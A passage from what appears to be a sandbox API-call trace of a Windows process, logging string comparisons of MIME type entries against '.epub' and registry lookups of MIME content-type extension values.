cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpe=video/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpg=video/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ogv=video/ogg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".moov=video/quicktime", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mov=video/quicktime", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mxu=video/vnd.mpegurl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qt=video/quicktime", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qtc=video/x-qtc", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rv=video/vnd.rn-realvideo", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ivf=video/x-ivf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".webm=video/webm", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wm=video/x-ms-wm", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmp=video/x-ms-wmp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmv=video/x-ms-wmv", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmx=video/x-ms-wmx", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wvx=video/x-ms-wvx", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rms=video/vnd.rn-realvideo-secure", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx=video/x-ms-asf-plugin", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".movie=video/x-sgi-movie", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".7z=application/x-7z-compressed", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".a=application/x-archive", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aab=application/x-authorware-bin", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aam=application/x-authorware-map", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aas=application/x-authorware-seg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".abw=application/x-abiword", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ace=application/x-ace-compressed", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ai=application/postscript", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".alz=application/x-alz-compressed", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ani=application/x-navi-animation", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".arj=application/x-arj", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf=application/vnd.ms-asf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bat=application/x-msdos-program", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bcpio=application/x-bcpio", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".boz=application/x-bzip2", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bz=application/x-bzip", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bz2=application/x-bzip2", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cab=application/vnd.ms-cab-compressed", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cat=application/vnd.ms-pki.seccat", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ccn=application/x-cnc", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cco=application/x-cocoa", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdf=application/x-cdf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cer=application/x-x509-ca-cert", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chm=application/vnd.ms-htmlhelp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chrt=application/vnd.kde.kchart", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cil=application/vnd.ms-artgalry", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".class=application/java-vm", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".com=application/x-msdos-program", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".clp=application/x-msclip", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpio=application/x-cpio", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpt=application/mac-compactpro", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cqk=application/x-calquick", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crd=application/x-mscardfile", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crl=application/pkix-crl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csh=application/x-csh", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dar=application/x-dar", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dbf=application/x-dbase", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dcr=application/x-director", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".deb=application/x-debian-package", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dir=application/x-director", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dist=vnd.apple.installer+xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".distz=vnd.apple.installer+xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dll=application/x-msdownload", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dmg=application/x-apple-diskimage", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc=application/msword", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dot=application/msword", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dvi=application/x-dvi", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dxr=application/x-director", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ebk=application/x-expandedbook", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eps=application/postscript", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".evy=application/envoy", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe=application/x-msdownload", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fdf=application/vnd.fdf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fif=application/fractals", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flm=application/vnd.kde.kivio", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fml=application/x-file-mirror-list", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gzip=application/x-gzip", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gnumeric=application/x-gnumeric", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gtar=application/x-gtar", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gz=application/x-gzip", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hdf=application/x-hdf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hlp=application/winhlp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hpf=application/x-icq-hpf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hqx=application/mac-binhex40", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hta=application/hta", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ims=application/vnd.ms-ims", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ins=application/x-internet-signup", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".iii=application/x-iphone", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".iso=application/x-iso9660-image", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jar=application/java-archive", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".karbon=application/vnd.kde.karbon", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kfo=application/vnd.kde.kformula", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kon=application/vnd.kde.kontour", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kpr=application/vnd.kde.kpresenter", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kpt=application/vnd.kde.kpresenter", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kwd=application/vnd.kde.kword", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kwt=application/vnd.kde.kword", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".latex=application/x-latex", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lha=application/x-lzh", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lcc=application/fastman", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lrm=application/vnd.ms-lrm", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lz=application/x-lzip", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzh=application/x-lzh", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzma=application/x-lzma", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzo=application/x-lzop", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzx=application/x-lzx", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m13=application/x-msmediaview", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m14=application/x-msmediaview", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpp=application/vnd.ms-project", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mvb=application/x-msmediaview", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".man=application/x-troff-man", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mdb=application/msaccess", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".me=application/x-troff-me", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ms=application/x-troff-ms", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".msi=application/x-msi", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpkg=vnd.apple.installer+xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mny=application/x-msmoney", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nix=application/x-mix-transfer", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".o=application/x-object", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".oda=application/oda", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odb=application/vnd.oasis.opendocument.database", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odc=text/x-ms-odc", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odf=application/vnd.oasis.opendocument.formula", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odg=application/vnd.oasis.opendocument.graphics", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odi=application/vnd.oasis.opendocument.image", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odm=application/vnd.oasis.opendocument.text-master", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp=application/vnd.oasis.opendocument.presentation", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods=application/vnd.oasis.opendocument.spreadsheet", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ogg=application/ogg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt=application/vnd.oasis.opendocument.text", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".otg=application/vnd.oasis.opendocument.graphics-template", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".oth=application/vnd.oasis.opendocument.text-web", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".otp=application/vnd.oasis.opendocument.presentation-template", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots=application/vnd.oasis.opendocument.spreadsheet-template", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ott=application/vnd.oasis.opendocument.text-template", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p10=application/pkcs10", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p12=application/x-pkcs12", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7b=application/x-pkcs7-certificates", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7m=application/pkcs7-mime", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7r=application/x-pkcs7-certreqresp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7s=application/pkcs7-signature", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".package=application/vnd.autopackage", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pfr=application/font-tdpfr", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pkg=vnd.apple.installer+xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf=application/pdf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pko=application/vnd.ms-pki.pko", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pl=application/x-perl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pnq=application/x-icq-pnq", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pot=application/vnd.ms-powerpoint", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps=application/vnd.ms-powerpoint", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt=application/vnd.ms-powerpoint", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppz=application/mspowerpoint", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ps=application/postscript", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pub=application/vnd.ms-publisher", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qpw=application/x-quattropro", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.317] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.317] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/fractals", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.318] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.319] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".fif", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.320] CharLowerBuffW (in: lpsz=".fif", cchLength=0x4 | out: lpsz=".fif") returned 0x4 [0104.320] CharLowerBuffW (in: lpsz="application/fractals", cchLength=0x14 | out: lpsz="application/fractals") returned 0x14 [0104.320] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.320] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/futuresplash", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.321] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.321] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".spl", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.322] CharLowerBuffW (in: lpsz=".spl", cchLength=0x4 | out: lpsz=".spl") returned 0x4 [0104.322] CharLowerBuffW (in: lpsz="application/futuresplash", cchLength=0x18 | out: lpsz="application/futuresplash") returned 0x18 [0104.322] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.322] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/hta", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.323] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.323] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".hta", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.324] CharLowerBuffW (in: lpsz=".hta", cchLength=0x4 | out: lpsz=".hta") returned 0x4 [0104.324] CharLowerBuffW (in: lpsz="application/hta", cchLength=0xf | out: lpsz="application/hta") returned 0xf [0104.324] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.324] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/java-deployment-toolkit", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.324] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0104.324] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.324] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/mac-binhex40", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 